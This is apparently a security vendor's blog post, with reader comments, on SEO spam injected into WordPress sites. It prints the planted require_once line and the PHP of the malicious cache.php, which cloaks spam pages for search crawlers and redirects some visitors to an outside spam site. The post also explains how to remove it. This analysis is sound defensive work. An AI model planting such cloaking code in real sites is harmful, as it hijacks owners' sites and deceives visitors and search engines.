WordPress SPAM Causing Headaches

Newly Released:

On 11/3/2017 we published our guide on how to secure your WordPress site and it also talks about vulnerabilities and best practices.

It seems that SPAM is all the rave these days, wonder why, could it be because it’s a multi-million business?

In any event, detecting is always a challenge as is remediating. This is what it might look like if you use our free scanner to scan the website:

Sucuri Spam Detection

Besides some of the obvious things we have started seeing tactics used on Joomla sites on WordPress ones. They are using things like this:


&#64require_once(ABSPATH . '/wp-includes/Text/cache.php');

You’ll find this in your wp-config.php file more often than not. If you follow the cookie trail you’ll find that the cache.php contains code like this:


<?php
$uniq_ua_string=@$_SERVER['HTTP_USER_AGENT'];
$uniq_ref=@$_SERVER["HTTP_REFERER"];
$is_human=1;
if (stristr($uniq_ua_string,"googlebot"))$is_human=0;
if (stristr($uniq_ua_string,"bing"))$is_human=0;
if (stristr($uniq_ua_string,"yahoo"))$is_human=0;
if(@$is_human == 0 && preg_match('/^/(?:index.(?:php|html?))?$/', @$_SERVER['REQUEST_URI'])) {
@readfile(dirname(__FILE__)."/css.php");
exit;
}
if(preg_match('/viagra/i', $uniq_ref) > 0) {header("Location: http://vaptk.com/in.php?t=v&s=1");exit;}

?>

If you follow the trail further and go to the css.php file you’ll find all kinds of goodies that will be of particular interest:

Sucuri SPAM Payload

What can I say, sometimes it’s all about following the cookie trail.

When removing be sure to remove the &#64require_once and the payload as well. The good news is if you’re running our plugin you’ll quickly identify an integrity issue in wp-includes and wp-config that will allow you to quickly act to rectify the issue. Because of the time of injection we’d venture to say that the vector is likely compromised credentials to the server, likely via FTP.


Any questions let us know.

4 comments
  1. Hi Tony,

    It’s definitely the rage these days as I usually receive about 300+ SPAM comments or trackbacks a day. I attribute the increase to the success of RBL services and the need of spammers to host their links and poison on legitimate trusted websites.

    Cheers!

  2. Hey Tony — thanks so much for this column. Your company seems to have more info on this than anyone; Hey we changed our passwords, and of course re-installed WP but we’re still getting this SEO message at the top. We can’t find any of the code you mentioned and have looked in the header file, css.php, cache.php, wp-config.php, etc. Any idea where it would be hiding? Would it be in a standalone javascript file?

  3. Oh and by the way, we are on a GoDaddy shared hosting situation, which seems to be where many of these hacks take place. Word to the wise to those folks looking to host their WordPress sites…

Comments are closed.

You May Also Like